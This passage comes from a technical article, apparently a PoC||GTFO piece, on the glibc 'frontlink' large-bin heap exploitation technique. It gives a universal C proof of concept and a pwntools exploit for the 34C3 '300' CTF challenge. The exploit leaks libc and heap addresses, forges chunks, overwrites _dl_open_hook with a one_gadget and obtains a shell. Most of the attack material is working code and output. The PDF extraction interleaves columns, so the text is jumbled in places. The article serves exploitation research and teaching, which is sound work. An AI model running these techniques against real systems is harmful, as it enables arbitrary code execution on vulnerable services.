3606 /∗ Always i n s e r t i n t h e s e c o n d p o s i t i o n . ∗/
3607 fwd = fwd−>f d ;
3608 else
3609 {
3610 v i c t i m −>f d _ n e x t s i z e = fwd ;
3611 v i c t i m −>b k _ n e x t s i z e = fwd−>b k _ n e x t s i z e ;
3612 fwd−>b k _ n e x t s i z e = v i c t i m ;
3613 v i c t i m −>b k _ n e x t s i z e −>f d _ n e x t s i z e = v i c t i m ;
3614 }
3615 bck = fwd−>bk ;
3616 }
3617 }
3618 else
3619 v i c t i m −>f d _ n e x t s i z e = v i c t i m −>b k _ n e x t s i z e = v i c t i m ;
3620 }
3621
3622 mark_bin ( av , v i c t i m _ i n d e x ) ;
3623 v i c t i m −>bk = bck ;
3624 v i c t i m −>f d = fwd ;
3625 fwd−>bk = v i c t i m ;
3626 bck−>f d = v i c t i m ;
...
3631 }

Figure 12. Extract of _int_malloc.

26
+−−−−−−−−−−−−−−−−−−−−+
| UNSORTED BIN |
MAIN ARENA: +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−+−−−−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
| | | fd | bk | | |
| | | | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−> | + | | <−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
| | | | | | | | | | |
| +−−−−−−−−−−−−−−−−−−−−−−−−−−+−−+−−−−−−+−−−−−−+−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | |
| | | |
| +−−−−−−−−−−−−−−+ +−−−−−−−−−−−−−−+ +−−−−−−−−−−−−−−+ +−−−−−−−−−+ | |
| | +−−−−−−−−−−−−−−−−−−−−−−−−−−+ | | | | | | |
| | | | | | | | | | | |
| | | +−−−−−−−−−−−+ +−−−−−−−−−−−+ +−−−−−−−−−−−−+ | +−−−−−−−−−−+ |
| | | | | | | | | | | | | | | | | || |
| +−−−−−v−v−−−−−+ | | +−−−−v−v−−−−−−+ | | +−−−−v−v−−−−−−+ | | +−−−−−−v−−v−−−+ | | +−−−−−vv−−−−−−+ |
HEAP | | s i z e : 0 x420 | | | | s i z e : 0 x410 | | | | s i z e : 0 x410 | | | | s i z e : 0 x420 | | | | s i z e : 0 x400 | |
| +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ | | +−−−−−−−−−−−−−+ |
| | fd +−−−+ | | fd +−−+ | | fd +−−+ | | fd +−−−+ | | fd +−−−−+
| +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+
+−−+ bk | +−+ bk | +−+ bk | +−−+ bk | +−+ bk |
+−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+
| f d _ n e x t s i z e +−−−+ | | | f d _ n e x t s i z e +−−−+ | | | f d _ n e x t s i z e +−−−−−−+

27
+−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−+ +−−−−−−−−−−−−−+ |
+−−+ b k _ n e x t s i z e | | | | +−−−+ b k _ n e x t s i z e | | | | +−−−+ b k _ n e x t s i z e | |
| +−−−−^−^−−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−−^−^−−−−−+ | +−−−−−−−−−−−−−+ | +−−−−^−−^−−−−−+ |
| | | | | | | | | | | |
| | | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | |
| | | | | | | |
| | | | | | | |
| | +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ | |
| | | |
| +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
| |
| |
+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+

Figure 13. A Large Bin with Seven Chunks of Three Sizes


The Frontlink Technique in 2001 written with the address of the chunk P
(at line 5).
For the sake of historical justice, the following is the
explanation of the frontlink technique concept from Bear in mind the implementation was somewhat
Vudo Malloc Tricks.25 different. The P referred to is the equivalent to
This is the code of list insertion in the old im- our victim pointer and there was no secondary
plementation: nextsize list.
#define f r o n t l i n k ( A, P , S , IDX , BK, FD ) {\
i f ( S < MAX_SMALLBIN_SIZE ) { \ The Universal Frontlink PoC
IDX = s m a l l b i n _ i n d e x ( S ) ; \
mark_binblock ( A, IDX ) ; \ In theory we see both editions are the very same
BK = bin_at ( A, IDX ) ; \
FD = BK−>f d ; \
technique, and it seems what was working in 2001
P−>bk = BK; \ is still working in 2018. It means we can write one
P−>f d = FD; \ PoC for all versions of glibc that were ever released!
FD−>bk = BK−>f d = P ; \ Please, dear neighbor, compile the code in Fig-
[ 1 ] } else { \
IDX = bin_index ( S ) ; \ ure 14 and execute it on any machine with any ver-
BK = bin_at ( A, IDX ) ; \ sion of glilbc and see if it works. I have tried it
FD = BK−>f d ; \ on Fedora Core 4 32-bit with glibc-2.3.5, Fedora 10
i f ( FD == BK ) { \ 32-bit live, Fedora 11 32-bit and Ubuntu 16.04 and
mark_binblock (A, IDX) ; \
} else { \ 17.10 64-bit. It worked on all of them.
[2] while (FD != BK \ We already covered the background of how the
&& S < c h u n k s i z e (FD) ) { \ overwrite happens, now we have just a few small
[3] FD = FD−>f d ; \
} \
details to cover in order to understand this PoC in
[4] BK = FD−>bk ; \ full.
} \ Chunks within malloc are managed in a struct
P−>bk = BK; \ called malloc_chunk which I copied to the PoC.
P−>f d = FD; \
[5] FD−>bk = BK−>f d = P ; \
When allocating a chunk to the user, malloc uses
} \ only the size field and therefore the first byte the
} user can use coincides with the fd field. To get
the pointer to the malloc_chunk, we use mem2chunk
which subtracts the offset of the fd field in the
And this is the description: malloc_chunk struct from the allocated pointer
(also copied from glibc).
If the free chunk P processed by The prev_size of a chunk resides in the last
frontlink() is not a small chunk, the sizeof(size_t) bytes of the previous chunk. It
code at line 1 is executed, and the proper may only be accessed if the previous chunk is not
doubly-linked list of free chunks is tra- allocated. But if it is allocated, the user may write
versed (at line 2) until the place where whatever she wants there. The PoC writes the string
P should be inserted is found. If the “YES” to this exact place.
attacker managed to overwrite the for- Another small detail is the allocation of
ward pointer of one of the traversed ALLOCATION_BIG sizes. These allocations have two
chunks (read at line 3) with the ad- roles: First they make sure that the chunks are not
dress of a carefully crafted fake chunk, coalesced (merged) and thus keep their sizes even
they could trick frontlink() into leav- when freed, but they also force the allocator to sort
ing the loop (2) while FD points to this the unsorted bin when there is no free chunk ready
fake chunk. Next the back pointer BK to server the request in a normal bin.
of that fake chunk would be read (at Now, the crux of the exploit is exactly as in the-
line 4) and the integer located at BK plus ory. Allocate two large chunks, p1 and p2. Free and
8 bytes (8 is the offset of the fd field corrupt p2, which is in the large-bin. Then free and
within a boundary tag) would be over- insert p1 into the bin. This insertion overwrites the
25 unzip pocorgtfo18.pdf vudo.txt # Phrack 57:8
26 Note that the loop in the beginning of the PoC main fills the per-thread caching mechanism introduced in GlibC version 2.26

28
1 #i n c l u d e < s t d i o . h>
#i n c l u d e < s t d l i b . h>
3 #i n c l u d e < a s s e r t . h>
#i n c l u d e < s t r i n g . h>
5 #i n c l u d e < s t d d e f . h>

7 /∗ C o p i ed from g l i b c −2.24 m a l l o c / m a l l o c . c ∗/
#i f n d e f INTERNAL_SIZE_T
9 #d e f i n e INTERNAL_SIZE_T s i z e _ t
#e n d i f
11
/∗ The c o r r e s p o n d i n g word s i z e ∗/
13 #d e f i n e SIZE_SZ ( s i z e o f (INTERNAL_SIZE_T) )

15 s t r u c t malloc_chunk {
INTERNAL_SIZE_T prev_size ; /∗ Size of p r e v i o u s chunk ( i f f r e e ) . ∗/
17 INTERNAL_SIZE_T size ; /∗ Size in bytes , i n c l u d i n g overhead . ∗/

19 struct malloc_chunk ∗ f d ; /∗ double l i n k s −− u s e d only if free . ∗/


struct m a l l o c _ c h u n k ∗ bk ;
21
/∗ Only u s e d f o r l a r g e b l o c k s : p o i n t e r t o n e x t l a r g e r s i z e . ∗/
23 s t r u c t m a l l o c _ c h u n k ∗ f d _ n e x t s i z e ; /∗ d o u b l e l i n k s −− u s e d o n l y i f free . ∗/
s t r u c t malloc_chunk ∗ b k _ n e x t s i z e ;
25 };
typedef struct m a l l o c _ c h u n k ∗ mchunkptr ;
27
/∗ The s m a l l e s t p o s s i b l e chunk ∗/
29 #d e f i n e MIN_CHUNK_SIZE ( o f f s e t o f ( s t r u c t malloc_chunk , f d _ n e x t s i z e ) )
#d e f i n e mem2chunk (mem) ( ( mchunkptr ) ( ( char ∗ ) (mem) − 2∗SIZE_SZ ) )
31 /∗ End o f m a l l o c . c d e c l e r a t i o n s ∗/

33 #d e f i n e ALLOCATION_BIG ( 0 x800 − s i z e o f ( s i z e _ t ) )

35 int main ( i n t a r g c , char ∗∗ a r g v ) {


char ∗YES = "YES" ;
37 char ∗NO = "NOPE" ;
int i ;
39
// f i l l t h e t c a c h e − i n t r o d u c e d i n g l i b c 2 . 2 6
41 f o r ( i = 0 ; i < 6 4 ; i ++) {
void ∗tmp = m a l l o c (MIN_CHUNK_SIZE + s i z e o f ( s i z e _ t ) ∗ ( 1 + 2∗ i ) ) ;
43 m a l l o c (ALLOCATION_BIG) ;
f r e e ( tmp ) ;
45 m a l l o c (ALLOCATION_BIG) ;
}
47
char ∗ v e r d i c t = NO;
49 p r i n t f ( " Should f r o n t l i n k work ? %s \ n " , verdict ) ;

51 // Make a s m a l l a l l o c a t i o n and p u t t h e s t r i n g "YES" i n i t ’ s end


char ∗ p0 = m a l l o c (ALLOCATION_BIG) ;
53 a s s e r t ( s t r l e n (YES) < s i z e o f ( s i z e _ t ) ) ; // t h i s i s n o t an o v e r f l o w
memcpy ( p0 + ALLOCATION_BIG − s i z e o f ( s i z e _ t ) , YES , 1 + s t r l e n (YES) ) ;
55
// Make two a l l o c a t i o n s r i g h t after it and allocate a small chunk in between to separate
57 void ∗∗ p1 = m a l l o c ( 0 x720 −8) ;
m a l l o c (ALLOCATION_BIG) ;
59 void ∗∗ p2 = m a l l o c ( 0 x710 −8) ;
m a l l o c (ALLOCATION_BIG) ;
61
// f r e e t h i r d a l l o c a t i o n and sort it into a large bin
63 f r e e ( p2 ) ;
m a l l o c (ALLOCATION_BIG) ;
65
/∗ V u n l e r a b l i l i t y ! o v e r w r i t e b k o f p2 s u c h t h a t s t r c o i n c i d e s w i t h t h e pointed chunk ’ s fd ∗/
67 // p2 [ 1 ] = ( ( v o i d ∗ )&v e r d i c t ) − 2∗ s i z e o f ( s i z e _ t ) ;
mem2chunk ( p2 )−>bk = ( ( void ∗ )&v e r d i c t ) − o f f s e t o f ( s t r u c t malloc_chunk , fd ) ;
69 /∗ b a c k t o normal b e h a v i o u r ∗/

71 // f r e e t h e s e c o n d a l l o c a t i o n and sort i t
// t h i s w i l l o v e r w r i t e s t r w i t h a pointer to the end of p0 − where we p u t "YES"
73 f r e e ( p1 ) ;
m a l l o c (ALLOCATION_BIG) ;
75
// c h e c k i f i t worked
77 p r i n t f ( " Does f r o n t l i n k work ? %s \ n " , verdict ) ;
return 0 ;
79 }

Figure 14. Universal Frontlink PoC

29
verdict pointer with mem2chunk(p1), which points function calls a static init function which tries to
to the last sizeof(size_t) bytes of p0.26 dlopen libgcc_s.so.1.
So if we manage to fail an integrity check, we can
Control PC or GTFO trigger dlopen which in turn will use data pointed
by _dl_open_hook to change the programs flow.
Now that we have frontlink covered, and we know Win!
how to overwrite a pointer to data in our control,
it’s time to control the flow. The best victim to Madness? Exploit 300!
overwrite is _dl_open_hook. This pointer in glibc,
when not NULL, is used to alter the behavior of Now that we know everything there is to know, it’s
dlopen, dlsym, and dlclose. If set, an invocation time to use this technique in the real world. For
of any of these functions will use a callback in the PoC purposes, we solve the 300 CTF challenge from
struct dl_open_hook pointed by _dl_open_hook. the last Chaos Communication Congress, 34c3.
It’s a very simple structure. Here is the source code of the challenge, cour-
tesy of its challenge author, Stephen Röttger,
1 struct dl_open_hook {
void ∗ ( ∗ dlopen_mode ) ( const char ∗name , a.k.a. Tsuro:
3 i n t mode ) ;
1 #include <u n i s t d . h>
void ∗ ( ∗ dlsym ) ( void ∗map ,
#include < s t r i n g . h>
5 const char ∗name ) ;
3 #include <e r r . h>
i n t ( ∗ d l c l o s e ) ( void ∗map) ;
#include < s t d l i b . h>
7 };
5
#define ALLOC_CNT 10
7
char ∗ a l l o c s [ALLOC_CNT] = { 0 } ;
When invoking dlopen, it actually calls 9
dlopen_mode which has the following implementa- void myputs ( const char ∗ s ) {
tion: 11 write (1 , s , s tr len ( s ) ) ;
w r i t e ( 1 , " \n" , 1 ) ;
1 i f ( _ _ g l i b c _ u n l i k e l y ( _dl_open_hook!=NULL) ) 13 }
return _dl_open_hook
3 −>dlopen_mode ( name , mode ) ; 15 i n t r e a d _ i n t ( ) {
char b u f [ 1 6 ] = " " ;
17 s s i z e _ t c n t = r e a d ( 0 , buf , s i z e o f ( b u f ) −1) ;
i f ( c n t <= 0 ) {
Thus, controlling the data pointed to by 19 e r r (1 , " read " ) ;
}
_dl_open_hook and being able to trigger a call to 21 buf [ cnt ] = 0 ;
dlopen is sufficient for hijacking a program’s flow. return a t o i ( b u f ) ;
Now, it’s time for some magic. dlopen is not a 23 }
very common function to use. Most binaries know
25 void menu ( ) {
at compile time which libraries they are going to myputs ( " 1 ) a l l o c " ) ;
use, or at least in program initialization process and 27 myputs ( " 2 ) w r i t e " ) ;
don’t use dlopen during the programs normal oper- myputs ( " 3 ) p r i n t " ) ;
ation. So causing a dlopen invocation may be far 29 myputs ( " 4 ) f r e e " ) ;
}
fetched in many circumstances. Fortunately, we are 31
in a very specific scenario here: a heap corruption. void a l l o c _ i t ( i n t s l o t ) {
By default, when the heap code fails an integrity 33 a l l o c s [ s l o t ] = m a l l o c ( 0 x300 ) ;
check, it uses malloc_printerr to print the error }
35
to the user using __libc_message. This happens void w r i t e _ i t ( i n t s l o t ) {
after printing the error and before calling abort, 37 r e a d ( 0 , a l l o c s [ s l o t ] , 0 x300 ) ;
printing a backtrace and memory maps. The func- }
39
tion generating the backtrace and memory maps is void p r i n t _ i t ( i n t s l o t ) {
backtrace_and_maps which calls the architecture- 41 myputs ( a l l o c s [ s l o t ] ) ;
specific function __backtrace. On x86_64, this }
with commit d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc. After filling this cache, all our operations will behave as expected.
Understanding it is beyond the scope of this paper, and on versions before 2.26 it can be removed.

30
43
void f r e e _ i t ( i n t s l o t ) {
45 free ( allocs [ slot ]) ;
}
47
i n t main ( i n t a r g c , char ∗ a r g v [ ] ) {
49 while ( 1 ) {
menu ( ) ;
51 int c h o i c e = read_int ( ) ;
myputs ( " s l o t ? (0 −9) " ) ; A solution to a challenge always start with some
53 int s l o t = read_int ( ) ; boilerplate. Defining functions to invoke specific
i f ( s l o t < 0 | | s l o t > 9) {
55 exit (0) ; functions in the remote target and some convenience
} functions. We use the brilliant Pwn library for com-
57 switch ( c h o i c e ) { munication with the vulnerable process, conversion
case 1 :
of values, parsing ELF files and probably some other
59 alloc_it ( slot ) ;
break ; things.27
61 case 2 :
write_it ( s l o t ) ;
63 break ;
case 3 :
65 print_it ( slot ) ;
This code is quite self-explanatory. alloc_it,
break ; print_it, write_it, free_it invoke their corre-
67 case 4 : sponding functions in the remote target. The chunk
free_it ( slot ) ; function receives an offset and a dictionary of fields
69 break ;
default : of a malloc_chunk and their values and returns a
71 exit (0) ; dictionary of the offsets to which the values should
} be written. For example, chunk(offset=0x20,
73 } bk=0xdeadbeef) returns {56: 3735928559} as
return 0 ;
75 } the offset of bk field is 0x18 thus 0x18 + 0x20 is 56
(and 0xdeadbeef is 3735928559). The chunk func-
tion is used in combination with pwn’s fit function
The purpose of the challenge is to execute arbi- which writes specific values at specific offsets.28
trary code on a remote service executing the code
above. We see that in the globals section there is
an array of ten pointers. As clients, we have the
Now, the first thing we want to do to solve this
following options:
challenge is to know the base address of libc, so we
1. Allocate a chunk of size 0x300 and assign its can derive the locations of various data in libc—and
address to any of the pointers in the array. also the address of the heap, so we can craft pointers
to our controlled data.
2. Write 0x300 bytes to a chunk pointed by a
pointer in the array.
3. Print the contents of any chunk pointed in the
array. As we can print chunks after freeing them, leak-
ing these addresses is quite easy. By freeing two
4. Free any pointer in the array. non-consecutive chunks and reading their fd point-
ers (the field which coincides with the pointer re-
5. Exit.
turned to the caller when a chunk is allocated), we
The vulnerability here is straightforward: Use- can read the address of the unsorted bin because
After-Free. As no code ever zeros the pointers in the first chunk in it points to its address. And we
the array, the chunks pointed by them are accessi- can also read the address of that chunk by reading
ble after free. It is also possible to double-free a the fd pointer of the second freed chunk, because it
pointer. points to the first chunk in the bin. See Figure 15.
27 http://docs.pwntools.com/en/stable/index.html
28 The base parameter is just for pretty-printing the hexdumps in the real memory addresses

31
1 from pwn import ∗

3 LIBC_FILE = ’ . / l i b c . s o . 6 ’
l i b c = ELF( LIBC_FILE )
5 main = ELF( ’ . / 3 0 0 ’ )

7 c o n t e x t . a r c h = ’ amd64 ’

9 r = main . p r o c e s s ( env={ ’LD_PRELOAD ’ : l i b c . path } )

11 d2 = s u c c e s s
def menu ( s e l , s l o t ) :
13 r . s e n d l i n e a f t e r ( ’ 4 ) f r e e \n ’ , s t r ( s e l ) )
r . s e n d l i n e a f t e r ( ’ s l o t ? (0 −9) \n ’ , s t r ( s l o t ) )
15
def a l l o c _ i t ( s l o t ) :
17 d2 ( " a l l o c {} " . format ( s l o t ) )
menu ( 1 , s l o t )
19
def p r i n t _ i t ( s l o t ) :
21 d2 ( " p r i n t {} " . format ( s l o t ) )
menu ( 3 , s l o t )
23 r e t = r . r e c v u n t i l ( ’ \ n1 ) ’ , drop=True )
d2 ( " r e c e i v e d : \ n{} " . format ( hexdump ( r e t ) ) )
25 return r e t

27 def w r i t e _ i t ( s l o t , buf , b a s e =0) :


d2 ( " w r i t e { } : \ n{} " . format ( s l o t , hexdump ( buf , b e g i n=b a s e ) ) )
29 menu ( 2 , s l o t )
## The i n t e r a c t i o n w i t h t h e b i n a r y i s t o o f a s t , and some o f t h e d a t a i s n o t
31 ## w r i t t e n p r o p e r l y . This s h o r t d e l a y f i x i t .
time . s l e e p ( 0 . 0 0 1 )
33 r . send ( b u f )

35 def f r e e _ i t ( s l o t ) :
d2 ( " f r e e {} " . format ( s l o t ) )
37 menu ( 4 , s l o t )

39 def m e r g e _ d i c t s ( ∗ d i c t s ) :
""" r e t u r n sum ( d i c t s ) """
41 return {k : v f o r d in d i c t s f o r k , v in d . i t e m s ( ) }

43 def chunk ( o f f s e t =0 , b a s e =0 , ∗∗ kwargs ) :


""" b u i l d d i c t i o n a r y o f o f f s e t s and v a l u e s a c c o r d i n g t o f i e l d name and b a s e o f f s e t """
45 f i e l d s = [ ’ p r e v _ s i z e ’ , ’ s i z e ’ , ’ f d ’ , ’ bk ’ , ’ f d _ n e x t s i z e ’ , ’ b k _ n e x t s i z e ’ , ]
d2 ( " c r a f t chunk { } : {} " . format (
47 ’ ({:# x } ) ’ . format ( b a s e + o f f s e t ) i f b a s e e l s e ’ ’ ,
’ ’ . j o i n ( ’ {}={:#x} ’ . format ( name , kwargs [ name ] ) f o r name in f i e l d s i f name in kwargs ) ) )
49
o f f s = {name : o f f ∗8 f o r o f f , name in enumerate ( f i e l d s ) }
51 return { o f f s e t+o f f s [ name ] : kwargs [ name ] f o r name in f i e l d s i f name in kwargs }

53 ## uncomment t h e n e x t l i n e t o s e e e x t r a communication and debug s t r i n g s


#c o n t e x t . l o g _ l e v e l = ’ debug ’

32
+−−−−−−−−−−−−−−−−+
2 | UNSORTED BIN |
+−−−−−−−−−−−−−−−−−−−−−−−−−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
4 | | fd | bk | |
MAIN ARENA | +−−−−−−−−−−−−−> | <−−−−−−−−−−−−−−+ |
6 | | | | | | |
| | +−−−−−−−−−+ | +−−−−−−−−−−−−+ | |
8 | | | | | | | | |
+−−−−−−−−−−−−−−−−−−−+−−−−−−−+−−−−−−−−+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
10 | | | |
| | +−−−−−−−−−−−−−−−−−−−+ | |
12 | | | | | |
| | | +−−−−−−−−−−−−−−−−−−−−+ | |
14 | | | | | | | |
| +−−v−v−−−+ | | +−−v−v−−−+ |
16 HEAP | | CHUNK3 | | | | CHUNK1 | |
| +−−−−−−−−+ | | +−−−−−−−−+ |
18 | | fd +−−+ | | fd +−−+
| +−−−−−−−−+ | +−−−−−−−−+
20 +−−−+ bk | +−−−−+ bk |
+−−−−−−−−+ +−−−−−−−−+

Figure 15

We can quickly test this arrangement in Python. It will produce something like the following output.

i n f o ( " l e a k i n g unsorted bin address " )


2 alloc_it (0)
alloc_it (1) 1 [∗] l e a k i n g unsorted bin address
4 alloc_it (2) [+] alloc 0
alloc_it (3) 3 [+] alloc 1
6 alloc_it (4) [+] alloc 2
free_it (1) 5 [+] alloc 3
8 free_it (3) [+] alloc 4
leak = print_it (1) 7 [+] free 1
10 u n s o r t e d _ b i n = u64 ( l e a k . l j u s t ( 8 , ’ \ x00 ’ ) ) [+] free 3
i n f o ( ’ u n s o r t e d b i n {:#x} ’ . format ( 9 [+] print 1
12 unsorted_bin ) ) [+] received :
UNSORTED_OFFSET = 0 x3c1b58 11 00000000 58 db 45 3 f 55 7 f
14 l i b c . a d d r e s s=unsorted_bin−UNSORTED_OFFSET [∗] unsorted bin 0 x7f553f45db58
i n f o ( " l i b c b a s e a d d r e s s {:#x} " . format ( 13 [ ∗ ] l i b c base address 0 x7f553f09c000
16 l i b c . address ) ) [∗] l e a k i n g heap
15 [ + ] print 3
18 i n f o ( " l e a k i n g heap " ) [+] received :
leak = print_it (3) 17 00000000 10 c3 84 6 e 0 a 56
20 chunk1_addr = u64 ( l e a k . l j u s t ( 8 , ’ \ x00 ’ ) ) [∗] heap 0 x 5 6 0 a 6 e 8 4 c 0 0 0
heap_base = chunk1_addr − 0 x310 19 [ ∗ ] cleaning a l l allocations
22 i n f o ( ’ heap {:#x} ’ . format ( heap_base ) ) [+] free 0
21 [ + ] free 2
24 i n f o ( " c l e a n i n g a l l allocations ") [+] free 4
free_it (0)
26 f r e e _ i t ( 2 )
free_it (4)

33
write the bk pointer of a chunk which starts 0x10 be-
fore the allocation of slot 0 (offset=-0x10), i.e., the
chunk in the unsorted bin. When making another
allocation, the chunk in the unsorted bin is removed
and returned to the caller and the bk pointer of the
unsorted bin is updated to point to the bk of the
removed chunk.
Now that the bk of the unsorted bin pointer
points to the controlled region in slot 1, we forge
a list that has a fake chunk with size 0x400, as this
size belongs in the large bin, and another chunk of
size 0x310. When requesting another allocation of
size 0x300, the first chunk is sorted and inserted to
the large bin and the second chunk is immediately
Now that we know the address of libc and the
returned to the caller.
heap, it’s time to craft our frontlink attack. First,
we need to have a chunk we control in the large bin. i n f o ( " populate l a r g e bin " )
Unfortunately, the challenge’s constraints do not let 2 w r i t e _ i t ( 1 , f i t ( merge_dicts (
chunk ( b a s e=c o n t r o l l e d , o f f s e t =0x0 ,
us free a chunk with a controlled size. However, we 4 s i z e =0x401 , bk=c o n t r o l l e d +0x30 ) ,
can control a freed chunk in the unsorted bin. As chunk ( b a s e=c o n t r o l l e d , o f f s e t =0x30 ,
chunks inserted to the large bin are first removed 6 s i z e =0x311 , bk=c o n t r o l l e d +0x60 ) ,
from the unsorted bin, this provides us with a prim- )))
8 alloc_it (3)
itive which is sufficient to our needs.
We overwrite the bk of a chunk in the unsorted
bin.
i n f o ( " populate unsorted bin " ) [ ∗ ] populate l a r g e bin
2 alloc_it (0) 2 [ + ] c r a f t chunk ( 0 x 5 6 0 a 6 e 8 4 c 3 2 0 ) :
alloc_it (1) s i z e =0x401 bk=0x 5 6 0 a 6 e 8 4 c 3 5 0
4 free_it (0) 4 [ + ] c r a f t chunk ( 0 x 5 6 0 a 6 e 8 4 c 3 5 0 ) :
s i z e =0x311 bk=0x 5 6 0 a 6 e 8 4 c 3 8 0
6 i n f o ( " h i j a c k unsorted bin " ) 6 [+] write 1:
## c o n t r o l l e d chunk #1 i s our l e a k e d chunk 560 a 6 e 8 4 c 3 2 0 61 61 61 61 62 61 61 61
8 c o n t r o l l e d = chunk1_addr + 0 x10 8 01 04 00 00 00 00 00 00
chunk0_addr = heap_base 560 a 6 e 8 4 c 3 3 0 65 61 61 61 66 61 61 61
10 w r i t e _ i t ( 0 , f i t ( chunk ( b a s e=chunk0_addr+0x10 , 10 50 c3 84 6 e 0 a 56 00 00
o f f s e t =−0x10 , 560 a 6 e 8 4 c 3 4 0 69 61 61 61 6 a 61 61 61
12 bk=c o n t r o l l e d ) ) , 12 6b 61 61 61 6 c 61 61 61
b a s e=chunk0_addr+0x10 ) 560 a 6 e 8 4 c 3 5 0 6d 61 61 61 6 e 61 61 61
14 a l l o c _ i t ( 3 ) 14 11 03 00 00 00 00 00 00
560 a 6 e 8 4 c 3 6 0 71 61 61 61 72 61 61 61
16 80 c3 84 6 e 0 a 56 00 00
[+] a l l o c 3
[∗] populate unsorted bin
2 [+] alloc 0
[+] alloc 1
4 [+] free 0 Perfect! we have a chunk in our control in the
[∗] h i j a c k unsorted bin large bin. It’s time to corrupt this chunk!
6 [+] c r a f t chunk ( 0 x 5 6 0 a 6 e 8 4 c 0 0 0 ) : bk=0 We point the bk and bk_nextsize of this chunk
x560a6e84c320
before the _dl_open_hook and put some more
[+] write 0:
8 560 a 6 e 8 4 c 0 1 0 61 61 61 61 62 61 61 61 forged chunks in the unsorted bin. The first chunk
20 c3 84 6 e 0 a 56 00 00 will be the chunk which its address is written to
10 [ + ] a l l o c 3 _dl_open_hook so it must have a size bigger then
0x400 yet belongs in the same bin. The next chunk
is of size 0x310 so it is returned to the caller after
Here we allocated two chunks and free the first, request of allocation of 0x300 and after inserting the
which inserts it to the unsorted bin. Then we over- 0x410 into the large bin and performing the attack.

34
This allocation overwrites _dl_open_hook with
1 i n f o ( """ f r o n t l i n k attack : h i j a c k
_dl_open_hook ({:# x } ) " " " . f o r m a t (
the address of controlled+0x60, the address of the
3 l i b c . symbols [ ’ _dl_open_hook ’ ] ) ) 0x410 chunk.
w r i t e _ i t ( 1 , f i t ( merge_dicts ( Now it’s time to hijack the flow. We over-
5 chunk ( b a s e=c o n t r o l l e d , o f f s e t =0x0 , write offset 0x60 of the controlled chunk with
s i z e =0x401 ,
7 # We don ’ t have t o u s e both f i e l d s t o one_gadget, an address when jumped to executes
# o v e r w r i t e _dl_open_hook . One i s enough exec("/bin/bash"). We also write an easily de-
9 # but both must p o i n t t o a w r i t a b l e tectable bad size to the next chunk in the unsorted
# address . bin, then make an allocation. The allocator detects
11 bk=l i b c . symbols [ ’ _dl_open_hook ’ ] − 0 x10 ,
b k _ n e x t s i z e= the bad size and tries to abort. The abort process in-
13 l i b c . symbols [ ’ _dl_open_hook ’ ] − 0 x20 ) , vokes _dl_open_hook->dlopen_mode which we set
chunk ( b a s e=c o n t r o l l e d , o f f s e t =0x60 , to be the one_gadget and we get a shell! See Fig-
15 s i z e =0x411 , bk=c o n t r o l l e d + 0 x90 ) ,
ure 16 for the code.
chunk ( b a s e=c o n t r o l l e d , o f f s e t =0x90 , s i z e =0
x311 , [ ∗ ] s e t _dl_open_hook−>dlmode
17 bk=c o n t r o l l e d + 0 xc0 ) , 2 = ONE_GADGET ( 0 x 7 f 5 5 3 f 1 8 d 6 5 1 )
) ) , b a s e=c o n t r o l l e d ) [ ∗ ] and make t h e n e x t chunk removed from t h e
19 a l l o c _ i t ( 3 ) 4 u n s o r t e d b i n t r i g g e r an e r r o r
[ + ] c r a f t chunk ( 0 x 5 6 0 a 6 e 8 4 c 3 e 0 ) : s i z e =−0x1
6 [+] write 1:
560 a 6 e 8 4 c 3 2 0 61 61 61 61 62 61 61 61
1 [∗] f r o n t l i n k attack : 8 63 61 61 61 64 61 61 61
h i j a c k _dl_open_hook ( 0 x 7 f 5 5 3 f 4 6 2 2 e 0 ) 560 a 6 e 8 4 c 3 3 0 65 61 61 61 66 61 61 61
3 [+] c r a f t chunk ( 0 x 5 6 0 a 6 e 8 4 c 3 2 0 ) : 10 67 61 61 61 68 61 61 61
s i z e =0x401 bk=0x 7 f 5 5 3 f 4 6 2 2 d 0 560 a 6 e 8 4 c 3 4 0 69 61 61 61 6 a 61 61 61
5 b k _ n e x t s i z e=0 x 7 f 5 5 3 f 4 6 2 2 c 0 12 6b 61 61 61 6 c 61 61 61
[+] c r a f t chunk ( 0 x 5 6 0 a 6 e 8 4 c 3 8 0 ) : 560 a 6 e 8 4 c 3 5 0 6d 61 61 61 6 e 61 61 61
7 s i z e =0x411 bk=0x 5 6 0 a 6 e 8 4 c 3 b 0 14 6 f 61 61 61 70 61 61 61
[+] c r a f t chunk ( 0 x 5 6 0 a 6 e 8 4 c 3 b 0 ) : 560 a 6 e 8 4 c 3 6 0 71 61 61 61 72 61 61 61
9 s i z e =0x311 bk=0x 5 6 0 a 6 e 8 4 c 3 e 0 16 73 61 61 61 74 61 61 61
